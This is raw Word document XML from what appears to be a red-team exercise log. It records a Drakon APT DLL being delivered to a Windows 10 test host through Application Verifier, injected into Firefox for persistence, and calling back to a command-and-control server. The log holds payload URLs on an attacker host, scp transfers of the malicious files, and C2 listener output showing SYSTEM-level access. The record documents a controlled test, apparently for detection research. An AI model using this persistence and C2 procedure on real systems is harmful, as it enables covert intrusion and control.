        <w:t xml:space="preserve"> where a malicious dll named dbgstat.dll is downloaded.  The delivery method of the attack is the Application Verifier which is used to inject the Drakon APT into the Firefox process.  This attack utilizes the debugging capability built into Windows used to allow developers to debug memory allocations and runtime resouces.  Once the APT DLL has been loaded into Firefox, it connects back to C2.  This remains persistent and a connection to C2 is established each time Firefox is launched. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371A623A" w14:textId="076791C1" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>In this attack the user relaunches Firefox four times and at callback gethostname, getusername, and getprocesslist calls are made from the C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A37273C" w14:textId="73A74E15" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_vic99thyca3w" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="189" w:name="_Toc12600105"/>
      <w:bookmarkEnd w:id="188"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w14:paraId="00E8EC50" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-fivedirections-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.55</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE5F6E" w14:textId="68DCDE22" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_3csmm7kpk094" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="191" w:name="_Toc12600106"/>
      <w:bookmarkEnd w:id="190"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="5C5FB270"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Firefox 54.0.1 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D4FDB"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BITS (Failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FD7BFE"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Verifier Executable (tester.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558AADA4"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Drakon APT DLL (dbgstat.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44345BC6" w14:textId="417145E7" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_owkryccea79a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="193" w:name="_Toc12600107"/>
      <w:bookmarkEnd w:id="192"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="27B183B0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>11:03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015B8B9" w14:textId="75DBEF00" w:rsidR="00A351B2" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Installed filemon driver and started filemon service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116CCDF6" w14:textId="16260CB1" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D927750" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F81486" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66383810" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>VNC -&gt; Firefox http://215.237.119.171/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CBA06C" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Bits tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD60436" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://68.149.51.179/dbgstat.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C4F35" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://68.149.51.179/asdf_doesnt_exist_asdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26275196" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D71BD36" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7492AA" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>VNC -&gt; Firefox http://215.237.119.171/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B59A0" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Bits tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A2F1B" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://68.149.51.179/tester.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8E12CB" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://68.149.51.179/asdf_doesnt_exist_asdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0873FCD8" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B7B120" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7612FD7A" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Open cmd Run as admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51931DE4" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Users\admin\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE9550" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E2DD9A" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Cd C:\Users\admin\AppData\Local\Temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C37FC" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>// no file here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DC8CA0" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180B93F2" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Cd C:\Users\darpa\AppData\Local\Temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3758C6" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>// no file here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59555DB3" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF87797" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6910B458" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Searching C:\ in explorer for tester.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E381AA" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F22D99" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCC346D" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browse to http://68.149.51.179/dbgstat.dll </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68041E86" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>403 forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113EE39" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A6B7A0" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF7ACD" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>VNC -&gt; Firefox http://215.237.119.171/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76CB4A" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Bits tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A618DEE" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://68.149.51.179/dbgstat.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8EB834" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://68.149.51.179/asdf_doesnt_exist_asdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D8D71" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D67E6EB" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Browser locked up for some time but eventually resumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06128810" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFA7441" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164A9C0F" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[root@IS2 ~]# scp -o BindAddress=68.149.51.179 tester.exe admin@128.55.12.55:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4751B900" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.55 (128.55.12.55)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25330EC4" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>RSA key fingerprint is 99:b4:2c:3f:ad:69:fe:13:d0:97:ed:cd:00:3f:53:32.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA3FE8" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140284CB" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.55' (RSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD2D99" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.55's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BB15DA" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tester.exe                                                                                                                                                                                                                                                                                                100%   15KB  15.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31425324" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[root@IS2 ~]# scp -o BindAddress=68.149.51.179 dbgstat.dll admin@128.55.12.55:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C6B29" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.55's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3827F0FE" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dbgstat.dll                                                                                                                                                                                                                                                                                               100%  213KB 212.5KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5505BB" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC9BF63" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15:04 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFF488" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Cmd Run As Admin C:\Users\Admin\tester.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6014EEC1" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Tester.exe read dbgstat.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E184AF1" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FFB773" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D7D97" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/oc2_5d$ python ocMain.py --http 8110 --windows verscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4937AFEB" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7864AEB3" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498EF6A6" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C990E42" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4A62F" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8110  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2128395C" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D418F" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2638DB33" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3DFB9B" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA5F78" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D69AA" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [W1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB8E40" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ==============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7D11E2" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [W1] SCRIPT START: verscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23BC67" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ==============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FFA930" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Cmd: hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130A7453" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-fivedirections-test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D5E7C" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Cmd: whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BE75B7" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6CFEF" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Cmd: ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1953F797" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]  pid                                                                   process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E27C2" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]   0                                                                   &lt;unknown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62581764" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]   4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68862FF7" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]  348                                              \Device\HarddiskVolume2\Windows\System32\smss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB125C" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]  448                                              \Device\HarddiskVolume2\Windows\System32\csrss.exe</w:t>
      </w:r>
    </w:p>
